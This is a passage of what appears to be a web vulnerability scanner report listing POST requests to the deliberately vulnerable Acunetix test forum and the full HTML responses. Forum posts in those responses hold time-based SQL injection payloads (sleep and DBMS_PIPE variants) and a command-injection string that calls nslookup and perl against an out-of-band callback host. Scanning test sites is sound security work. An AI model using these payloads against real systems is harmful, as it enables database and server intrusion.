InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=54 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=54 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3244 |
Response Body - size: 3,244 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:58 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=55 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=55 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3145 |
Response Body - size: 3,145 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum if(now()=sysdate(),sleep(15),0) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/if(now()=sysdate(),sleep(15),0) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:59 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>if(now()=sysdate(),sleep(15),0) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=56 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=56 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3181 |
Response Body - size: 3,181 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=57 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=57 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3181 |
Response Body - size: 3,181 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=58 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3403 |
Response Body - size: 3,403 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:23 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=59 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=59 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3061 |
Response Body - size: 3,061 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1'" </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1'" </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1'" - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3251 |
Response Body - size: 3,251 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&'\"`0&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&`'</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=60 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=60 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3055 |
Response Body - size: 3,055 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> 